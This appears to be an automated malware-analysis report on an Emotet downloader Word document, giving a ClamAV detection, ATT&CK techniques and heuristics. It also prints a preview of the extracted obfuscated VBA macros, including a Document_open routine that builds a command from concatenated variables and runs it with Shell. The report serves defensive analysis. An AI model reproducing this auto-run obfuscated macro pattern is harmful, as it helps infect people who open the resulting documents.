MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-7070497-0', strongly suggesting the Emotet family. Static analysis revealed the presence of VBA macros, specifically a 'Document_Open' macro that utilizes the 'Shell()' function. This indicates the macro is designed to execute external commands, likely to download and run a secondary malicious payload. The document body content is heavily obfuscated and unreadable, providing no direct clues about the lure.
Heuristics 5
-
ClamAV: Doc.Downloader.Emotet-7070497-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7070497-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44361 bytes |
SHA-256: 6d69647304cf9670cc00e48e13c0e3c146c4410a95ac234dee27501e6763bd9f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "KHqSGffSfnrias"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function VusslabNcMkN()
On Error Resume Next
nYajqW = 92257 * 7084 / (jiivDb - mWmOuh) - QKics + 42055 - 30541 / iWRpF
bUsQi = 85908 * 59791 / (NPpKbO - jwmYO) - jrdilF + 49288 - 33386 / HiJzj
QwaRkh = 58571 * 9031 / (QRbEQ - VZPiS) - mVCrX + 66073 - 91405 / EiFaFh
Ejzur = 11812 * 68138 / (dHKGWG - LljzEu) - USbbTO + 86585 - 73313 / cLuCNG
WcmZow = 64364 * 34453 / (ffGaI - HzFJK) - ItDhL + 31525 - 91730 / dNWzs
MjlwW = 97312 * 94623 / (LjLzYc - bsKddX) - NzicQi + 22243 - 916 / iGCMft
End Function
Private Function JtYwXsTDopUBK()
On Error Resume Next
oiafdS = (YRmDpb / rrklj * 13972 + sSKanM + 36505 / hjwja * 90039 * ftkVRV * JTDrq * wkQaOK / 91889 * QFqGZ)
NMEdcF = (ZWCCJt / oTqGw * 58650 + zmOaEE + 10969 / rsGMa * 59360 * CvGpnd * incwOi * FvJVJ / 26984 * qDXBrC)
vzTsr = (uAJrK / DbwHq * 52700 + lzwrR + 32383 / Msinw * 52099 * YrfdV * oLvAiw * WOEQLP / 72684 * MzFBbU)
FHIBRA = (qBOpS / IqWvVW * 18840 + QVSPza + 30293 / tOrFYD * 24055 * pYwnuO * YsKHZ * ukDGlp / 72694 * lSZvBI)
End Function
Private Function lSGOUMSNPw()
On Error Resume Next
AvVAz = (lthMC / EzmbHQ * 43043 + sVjRZ + 70866 / zMzYNi * 29214 * YDKwMI * EwhFl * Liwraw / 17874 * PEaOMl)
hbiaU = (kmcnwi / qlcsKK * 29789 + InzdYm + 40206 / pbXDq * 36132 * UaUpw * szWcfd * qUEoic / 47987 * jwwzQk)
cinME = (zFBkdR / PDjlh * 67287 + UCMhkw + 17172 / JcYNNz * 84774 * uvubvz * lvBjZC * rDlGwZ / 42623 * cIUEw)
PEKXU = (qnHmXO / miPjtM * 70313 + cGASM + 79557 / lGqBO * 51566 * zWChKB * dTZKv * ttlKj / 78308 * mwJEIw)
npEpWO = (zUJQr / hkUzF * 75791 + AhmjFz + 15813 / jhzWTU * 19932 * AwRzJz * RhROh * GPHwC / 66181 * CYjZG)
YasXR = (SpUQu / pbBsI * 88458 + UXjVO + 88145 / ndYsiH * 8049 * zBnGJi * OURhI * EvDpWZ / 37958 * oFddkU)
End Function
Private Function VujLfkTdV()
On Error Resume Next
NIdjh = (BZrANG / YAGWL * 58590 + pFVKjf + 36738 / wGHvB * 48703 * SWwjTL * UcfGzv * ZKUVz / 28640 * mTzCQ)
GtBKR = 53552 * 55633 / (ijMtO - wTmPZM) - MCvbW + 97204 - 40828 / bKGzDE
CimEf = (Cojsjz / vdnUUm * 47729 + rlOGRB + 70255 / OfiLoM * 40537 * KOHQE * IsWPW * dJjsjh / 19542 * YzNqRB)
aCwNSS = (znRcj / LMrZct * 36649 + JdfjOn + 84163 / lnqbJS * 19056 * sjJTH * zsOuA * stBbV / 84741 * ZQdDf)
ktREtY = (jacLnC / tfdhXL * 42978 + mZCKrf + 7053 / hDjJji * 26524 * EXdqj * KLLXtn * UsTGo / 13865 * CjhCfd)
FnniI = (KFiIji / VkBfoJ * 10431 + lbHCbh + 23600 / RzDvv * 74605 * cnnwzd * bAfQC * LLdsM / 31988 * LjjjA)
End Function
Private Sub Document_open()
On Error Resume Next
zrknf = (91663 / BuUVvo * 39085 / whSan - 43870 - HXWtX - JFWVXR + qzrsV)
lbXhvI = (96367 / wcBWsp * 83247 / tCIwUM - 22107 - zYhFN - mjRRvc + UYETYW)
WvPvW = (41463 / kfUin * 65063 / lhKUEz - 21021 - ERCTMR - TIbqJ + jUjhY)
Shell "" + UvmRToObFZRzu + QmYwsozzX + CVar("c") + TAqZFiKMmbjbEt + RvGUdGjaGwG + hhNOGr + oFCRUw + IzdUwUj + uLaAHr + scLOWWmi + hDhdCzuDW + cXjsn + zaDMijmNE + mtkhCzEsvjw + szNiZjwpn + pmvtzRHiJU + zSpZVM + MqDdRviG + OIwwCMjJ + XRhdzt + UYmpbrzAnu + QapWniPkZY + kWbtfTpVF, 0
GKYqbY = (67696 / ZwzHr * 90605 / nPCZzz - 36638 - ahJoUG - MdcYMP + izjWX)
GOVdod = (64090 / YiWCb * 76411 / bDDmnc - 29027 - ZpYaH - aPobt + nHwDZJ)
OEYiEd = (92364 / ijdIGP * 82322 / IQhsXM - 55916 - BcasDr - OpjaR + ALGdi)
End Sub
Private Function wCfazTBmdPlO()
On Error Resume Next
iTXwX = (70083 / hNMru * 91269 / BYvhH - 52259 - VGMlC - pZNpiR + RErlwv)
zrsHNz = qZfQOa * YOJjdI * YPkacc - hnosoB
HGAKOR = FBlFHL * JwwQdL * HilZno - UUzQP
tVwOw = rfYdE * oGsDV * rDsKkY - JtWLaM
GPMwuq = (1233 / UTkDh * 17458 / LNUrh - 14228 - WIcPz - hJjMcX + qzmHC)
CRqcMa = (74984 / Cnwzph * 29716 / sArXiq - 50849 - hvYOkV - VdUbDt + HCwQAr)
End Function
Private Function JPLmQIG()
On Error R
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.